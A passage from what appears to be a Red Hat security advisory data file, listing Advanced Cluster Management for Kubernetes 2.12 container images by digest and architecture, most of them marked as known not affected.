"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:d448249f704e54f4316122fb3ad923295ffb5d6d2d16044803b56d1f8439de8f_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:ee2ffe06e09f3694be474d69be61552d0e5a4dd7a25df89682aa59e4a10e02f8_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multiclusterhub-rhel9@sha256:f9dfff5ac57b47b580c733413ab3d10dec4d4d50589da894eb0a8278978459f9_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:3aa3b11dfb3e0c9daba4818838a3a42e52ab81ecf27fb5fddd779746fd10d6d8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:8c19e6e38d755f35021ed1c57f3e69be65240df37539b72b8fe0d3f8ab050e36_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:a8f9a5a9f31cd903f23dfec9c832ed703d06882246aad25bd03e9512b633e5ca_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/prometheus-rhel9@sha256:e528d7996cda9185d5858a0edd8114b782d5627725d6e350fb087ba9f6270206_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:030626d6ba921752acbc68159d7a6776318416c93cfc4360ef8e3c145e9ee635_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:0bdccbe184d904b58291858f01597286b2a0c45584f9af263714089911390f4c_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:5fd8d966136617fd453431a649a6572ad640ca515b91c86b9a576c7b1e4fbd0e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/thanos-rhel9@sha256:c6b267f6f0bb960032c380a0d978ebe3c8cd948f57a92ba9855c273fbd40a487_arm64"
],
"known_not_affected": [
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:20a379058f6e7b95ba010b0ceb936e124a67ad493975557c4bfe085948166b6e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:7fb6e4b9729a300d9e82207ede660b52c2566fcdfb1f7174e5dd4cd59514afdf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:8a842f5c48c760be11d7df87fc2519bd9a68886bce7240aabea3e7a99c6bc172_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cli-rhel9@sha256:fdcd8eff118d00b93f7a197c992bd5ddd1cce96b2b5cf3b542403dcbcc812691_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:59a7ad296b2023d6a633e2f7b99767e2c0c35ead31c8d92bdf233ff52522125d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:5a1fba286678b5d606a3ad553041cd68df207820c5f11685f7df0e94d04c27e4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:60546ec2d4128da096811949b2609bdb9c7cb6205b36673ebe9d7b1ff868ea88_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-cluster-permission-rhel9@sha256:647b86bfc09d7eca6a7c3f7ee967ea60db1b90329600a0898f8f8b7bbdb204bf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:1ba9482f4a157a04b4b5cc212b7cbb98a323250969501698b230432a6ea545a5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:371bbcd62cb8e6c28cd3c1921e17c9067bc160433c4a6b14a1a2685a5f7d0519_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:922167d560484b217f772384cac0e9da48c31633ebf8984abf3ef99f5c31919b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-governance-policy-framework-addon-rhel9@sha256:fd95f9c98201fc9e2deb2ce1af7598056e7e2bd61e2db42d195fa8acd4958f79_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:0dbdb9d02b41e437dd885741918114d8eea5bcdb1e97098b8e026adaf0cc70de_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:5a2014800be744b5034e754ad88cc82c29779c629cf2aa52068274aecd7b9d88_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:dc38a15065a73653097c85f6eb1b287a97498bc69dd86e7dbcd9efe6853255bb_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-must-gather-rhel9@sha256:f544c239f288daac99ca0018719000678f2e9f27b8303a5182fa01777c4c12f0_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:0184923381940f806687d21a3422e16bee10b39b409fcecb50c940ed9b7e4d58_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:54390653fd89def95d9cba388cd37466ce709d843a9950b545091d9d9e14b4e4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:874f930ace72bd2771944e734432c322735b3bd91804019b211953070a308dd9_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-config-reloader-rhel9@sha256:d865a100823ff771c33e5e5799f16e1207158ab7519c6ac8a4daf53e1c4ae092_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:57fb017c2ba0f20880fc278689d37919ab95a88dffa0626d9a48050bef3b6fe3_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:7d87a9cda623d527c5eaa08c5637422ed136339a9688edd5e8e9cc46f254beb3_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:b123eb6e855ec01a82e6ec2afa052eb344e2851b3d134514c53162012852d568_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-prometheus-rhel9@sha256:f12861597e8d62263d2ffa52b1fd19614a063605968999aeef33f444cfa82539_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:28ca07a0f4c2f02d47bfecae31110cbdc3284f1a7d688b559ed7d6305930ce81_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:713fafc87903d4284173e4b9690d0e3deba23d51ca0974106f0a76a450c38501_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:9a6847c058acd9d84d402506ac00576e0c437edb261c8e564605abab1b97428c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-indexer-rhel9@sha256:c033acafe192f185dde20f032d399de7f4f9d25804ba96afe50e08eb1608a956_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:40cfab127e82cc6afc68b0642832e84ec45838db71d5500a42d87921ade70171_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:6dbefefd5b830cd9431559d7123d9643dca69e0cbbb58f5c5cc90f3d5e526c09_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:8262fa7a50560e0ac051f9ec158daceeb384acc92b1f98c0b7b73f5ec0451908_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-api-rhel9@sha256:b2ee688170d432298a3eb7d0b057a01bcba26dfddfeabca7941f4bc3fc865141_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:0478cb24ab3df5826881b91dd0ea1b8152defdd04e38d0bc500a860a828716b0_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:247872fe30c6d0bbb1098b6f189fd23aca2357122e591eb2bed3c79b0fe27055_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:b6a958526ae7d64016a110bd81ee38218bce014d52f10a6517a471bddfb93d45_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-search-v2-rhel9@sha256:ee89796a7ee9e6ab9cde9a5a450e16221bbdb74444188939c983d6d185bee08a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:243d75725446e0fe6be10ba04796c4db395f911470d1fd2575d35a3f1c82930c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:89f973ff38fcf35a484da1531bcf00db5e1d387a64a6dcbb25f19a5c26494584_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:a33b245208c9999546524f3bf971bb220418045dd799cebc43f0413823db0f8b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/acm-siteconfig-rhel9@sha256:ea918d66e2be8cc1411e048f3638afae348a44df36143621bcd3132718b33664_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:5f814b2ab34c4dcaedb7394d9f1ef9bd4d1bf6af934cd716ac44d1cfc43a6edf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:9acfa5180f02a68485cd1fc43e4794c7ffbac02c16942fabfbad9dd586c8ff74_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:c409f96ae15f3022713e434c4c8f146d943dbf48e852e0b8f90b4964ec0736a7_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cert-policy-controller-rhel9@sha256:f72ecb77638a3d19ef4480040995278031deb4551f139e376994bc0ac3462ef5_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:243ea42175c4fa3d189e2f2bf061c9645d5d3b2870378149c52740f563c91ce8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:3b23775b863a11e1edd62b24c01085b74019b7f414d0784c99d41b1e0e8a6e9b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:3e29508feb3f13f4771e6321f9b2f281d557e3239e52e29301ef30a305ffcde9_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/cluster-backup-rhel9-operator@sha256:427b347a2e17b66849dc51f9a62563ae8c013d5794c61821141dec737d059304_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:0b87acce1304734d30b2bfbd5d277e72efce2433680111e02fc5cff8127376dd_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:438093777b18dc840316a9a82331d832fdc9f3d83aaae20d97f56ed67b58a359_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:93d29e5678d618cfa84ce60f2d62ba96929ea47ec1515f63a9d61d548968e902_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/config-policy-controller-rhel9@sha256:b182a45fbe8caf69df6145ed79f2ab0e82c955ff5f5caa7fab8d0faffdb50664_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:0d6238ef864831d455a4a4b86d860469443079f6dcd26ce3b4fe546800565844_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:5c7378c5f1715490a88eaa2b791b4a643ee089f9b72ad4abfaf32d718f387fc8_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:7e8f4c171a3081e428c168b506c544775876df772803e2cae4512d3c46b45354_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/console-rhel9@sha256:8b0e5d09b887020a657b93953a63a788cf6dfc84200038be8417c2f9cd1df736_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:4f666d6acef380066f2a35f128a2842ee1f5cf800c93ac6b0fb3c303d3bde26b_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:6938b16a6314149cc86e10a91e05e9b84e00483dadd1d0353002222a350746bf_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:8b91cd509eee3e1a5e6475076512709bd233413bfbea5caa44455fd62bcc9d35_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/endpoint-monitoring-rhel9-operator@sha256:f734a96076321df1f52da24f047db29d3956ceb742f4fa488a11d5b302faf66f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:1cfe9d5337e2d2d6d714d5d1aecd00ed626f4c70a5a655d89c8001717be9a6f5_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:488d5dea57994e8d865f8047f3b0ed8b2250273898972eea576fa012bda5c0c4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:5bf4239a40668dd33521ad9cebdc2022331e251ad6fd2e8ec0de8526d321b9e5_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/governance-policy-propagator-rhel9@sha256:bc42add4b0d8571b0b78d09357c574a7d0a858769e6109a13d1487de36ba1d2f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:1395a46c08410f06aa507bedc8d664b6dabda344d9c604bd71bbd07fb07966c4_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:4b1bdbd8499769e3fe41d438ff2f98a0a91fecf88d70aa359a6be16aa5454fda_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:91d0b7afff7c89c667986f22280a95ab81409aacaf6c73ac6606bc7bbae98c7e_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/grafana-dashboard-loader-rhel9@sha256:c24affed309531bede6ca42f8b2a6b3ba4df5a8c59084bf5050290b8f031f364_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:036d63ee1fe55977200dce97fd151726266e84423067039c57ca54dcc8b6b440_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:1aff938b39c21378c0f8daa439e330159c0bd91f234035a127efb579f6434262_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:540de89284569933a75e87f4c85fc11f987a733f60f9d877f20e5c4fc054fabf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-client-rhel9@sha256:8352d34740671e09ebdd558bb2a40a8605aa26afbcfff8dae29ccaf86d81239d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:4707fd802a74ca843e2b788b69dc1d4615acba980df380e0cc25cfca6a82e215_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:5c3ee23cff1681f8e86f2bd5d1cebf187db867fb1887d7803638d1192e4b1a60_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:6260b2ecf13d9c5cdf95f0000044405d3ca03815937284b5e2848147d3366538_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/insights-metrics-rhel9@sha256:78cbcb6e0a0e43cbac6b285334ba789d4a4940e12f472d56a7d953b342a34d1f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:6c733e3c2cc551a4bb17601347f873d3b28e4d6b60a26db3587173c617a85c7e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:6cbf2b90d1cbfbca5fe5b04f73024a5d78248b1e4ccf6041b77018d79296e1ee_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:8b47e540acf25c492b4e6dff77f419c65c80e14d8c95555eba549a7fbbaed564_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/klusterlet-addon-controller-rhel9@sha256:fffd63a467ff39cb493e680ca5d7fff974c66afb014f3d5e83591b934e58b2ac_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:06ff7067f1bc9d0cafba03eeb46bf3214dd70f20e5eb05e3a989d12cfee5791f_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:33d9572f58f2bbd6c1dfc07908b328ecc25b12f578d2f3839f70763c032fe39e_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:997e343d3a52d953cca38ea609dabfa38d8e85e3122f0c48bdf34dc398b0e75c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-rbac-proxy-rhel9@sha256:ddeb74afd3c44b7e6ce34d14245f9b0e686af1d6628c2bae2b1ee4766107590e_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:8b4adb87be3cd1222dbec53de842569d89f1edc18f36f5da691f2b9aef851af8_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:a5544dbf33ee411c1e2bce8af5cfd7defda6de92a358097419f2bac069669275_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:b3caff7e4a5254b20d305ec57b70d372ba09a4605047812703a7c7df6628192b_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/kube-state-metrics-rhel9@sha256:cde651ab8f772b65d45464e4997c6ae17e655696afebf3ad51aa079853627061_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:33ae10350417be44904c47179d655c36e5724241e5dd1497d6952c46ada085e3_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:92c1123b4f6c4e89be7a0d9cd4adcafb9b97faebebd61dc24127661e45b61ec7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:b321bc989aede13694825dfa5ee6e6bf047e1d8da91a8fb83dc29cd0b27ab4ff_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/memcached-exporter-rhel9@sha256:d41b061123db846fb27ddccffa7c57528326bcfa109f7d0a754e64aa16304b05_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:19ccb43f156361e14c8d69a6d832b60a63801fec502bd0f1632a264611c00a5c_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:345bd79af661294f223be69961f96494da36e311906fb3a2e64b53677f65fd32_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:3cb2dd7e3a2cd4e2a46cde1f48dd72645c2c51e8bfc0eca8753cc851c726d29c_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/metrics-collector-rhel9@sha256:c834685380ba00674a2835151ec9e4932457abefe6318748aba92cbe8443307d_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:12c970f2005e943d674b35c711d2232f146bbbcf8e3807b3fb3c816b42e0cd8a_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:dc231932eb7a2a9969fae5fb0e6f95594d71ddf6f957a2cb4751950ab8332510_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:e671767bca7b68bada15e2820d0df6adc49fbffcdb6c9708ee3a5346a919a1e4_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicloud-integrations-rhel9@sha256:f64b875dcce5d957aaf198e2055a47f7faab441342aab6b2e055efe2d41c78b7_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:0799283c1830e1aadd09976286eec671d0a86e44c155238279938b4f329f7157_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:7143a1a00eae582cff7671ab03464db03db48e89bd988ecc4851278922aeea29_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:9bac11bcf557740673e7168bb31fb6db8c5d92609094e5f1d1cb4c3ef6bc9603_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-observability-rhel9-operator@sha256:ea03fd92669382846af5c8fa0b58f6858f123060d122f370d6af837f46d9d8aa_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:53a9844ffdd2d3f8cee8737722de91511cefdb4c65a7db614de6c4e070f70431_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:c603c06aa983d6b118e506bd2e6fba19f0cd26e379513c9c710ea517d2bc0d0f_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:d9a867a6d289263f568b8940a9b970c8680061c1f26aebb9f8cc479956e9a030_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-application-rhel9@sha256:f9e0a972cd08f77b71dd8b2217c57b98b36c5612ddfd6bb74704c378a03dd7e1_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:1bda811b132cbc2220815d36983af98e0aafdcb4d30fa78f56bbd85ffc30a37c_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:3bc66380cc46ef4bc18498a306535c11f0ba41a629bde92f9f6a35b8a8d11f89_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:c4f9eea72efd49d201456547b2a35abd6a194894e72c209bbe16763b86954639_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-channel-rhel9@sha256:d4b3934ecbd4882845770c313060dc76b588ffa3753f2b2ae0ec5f53ba868935_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:805d44ff7dcd6df5bd73cd58c0f410d8bdeac932d7c440b0c381517c3e1401ae_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:b3cbb2410596e3e0741f518ee3bbf8f6eebce0ea4a7ea4274a1e76f01692fe1e_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:c6365357cdc1cd7b0adc4e1813f42d2c67501f770ee58e376e0c02096baca731_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/multicluster-operators-subscription-rhel9@sha256:e3d8e0154fdaaa4e292949374fa637ec80827df473f2e3f8cc37425d98dc271b_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:5c90f0eddf6dbee5bdf11a6a818e4fbac22f6c8b2883728416dcc7aaeedd7362_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6528ed4780303fa09312c19f87c0f7d7109d91858473f73e6567e0fdde694b3f_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:6d1a86ffe09cbc6eba216db55800c21641e308dd1cee215972e0065136b9c612_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/node-exporter-rhel9@sha256:fc6ea36b48ce47052d875988f378cad3ec9cec80189a605acdf1509f2beb52cf_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:0caaa7f18df2105c9d6199343a70640dd6b558d7de55f2026f99b48d702c5afc_arm64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:28cfe0893f17b70ff67f70cb7e471c8c724bf921b7a36c69ca2c43505bae635e_amd64",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:7309f5d61a0fe99dfd8d523736afe2c8a709385e0eaaeaacfbda362fc7c2a16b_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9-operator@sha256:ccf06b51ce92c9f0fe9594b0082d0b09f77bb65b38ce08d5e02ac4f5a6fab2a4_ppc64le",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:31153305711975b0bd5f780133699aeca52e96859363e85718c9047b26a32dbf_s390x",
"Red Hat Advanced Cluster Management for Kubernetes 2.12:registry.redhat.io/rhacm2/observatorium-rhel9@sha256:55b2f0e54a6fdb3fb83f1af1f16524ebf36f0afb366f40fbbc8768cd4995ffb3_amd64",
